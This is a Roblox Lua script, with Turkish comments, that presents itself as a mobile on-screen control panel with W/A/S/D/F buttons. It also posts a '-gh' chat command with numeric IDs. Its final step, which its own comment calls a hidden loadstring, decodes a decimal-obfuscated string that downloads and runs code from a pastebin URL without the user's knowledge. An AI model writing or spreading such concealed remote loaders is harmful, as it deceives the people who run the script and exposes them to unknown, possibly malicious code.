if game.PlaceId == 123974602339071 then -- 1. ADIM: Mesajı Gönder (Sadece script ilk çalıştığında bir kez gider) game:GetService("TextChatService").TextChannels.RBXGeneral:SendAsync("-gh 62234425 3940375351 4047554959 3409612660 3443038622") -- 2. ADIM: Resetlendiğinde Silinmeyen GUI local playerGui = game.Players.LocalPlayer:WaitForChild("PlayerGui") -- Eğer eski bir panel varsa temizle (üst üste binmesin) if playerGui:FindFirstChild("MobilKontrol") then playerGui.MobilKontrol:Destroy() end local sg = Instance.new("ScreenGui") sg.Name = "MobilKontrol" sg.Parent = playerGui sg.ResetOnSpawn = false -- İŞTE BURASI: Karakter ölünce butonlar silinmez! local function createBtn(name, pos, key) local btn = Instance.new("TextButton", sg) btn.Name = name btn.Size = UDim2.new(0, 65, 0, 65) btn.Position = pos btn.Text = name btn.TextSize = 25 btn.BackgroundColor3 = Color3.fromRGB(35, 35, 35) btn.TextColor3 = Color3.new(1, 1, 1) btn.AutoButtonColor = true -- VirtualInput Kontrolü btn.MouseButton1Down:Connect(function() game:GetService("VirtualInputManager"):SendKeyEvent(true, key, false, game) btn.BackgroundColor3 = Color3.fromRGB(80, 80, 80) end) btn.MouseButton1Up:Connect(function() game:GetService("VirtualInputManager"):SendKeyEvent(false, key, false, game) btn.BackgroundColor3 = Color3.fromRGB(35, 35, 35) end) end -- Butonları En Alt Köşelere Yerleştir createBtn("W", UDim2.new(0, 100, 1, -200), Enum.KeyCode.W) createBtn("A", UDim2.new(0, 30, 1, -125), Enum.KeyCode.A) createBtn("S", UDim2.new(0, 100, 1, -125), Enum.KeyCode.S) createBtn("D", UDim2.new(0, 170, 1, -125), Enum.KeyCode.D) createBtn("F", UDim2.new(1, -120, 1, -140), Enum.KeyCode.F) -- 3. ADIM: 5 Saniye Bekle (Sadece ilk çalışmada) task.wait(5) -- 4. ADIM: Senin Gizli Loadstring local _ = "\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\74\98\84\68\118\114\76\98\34\41\41\40\41" pcall(loadstring(_)) end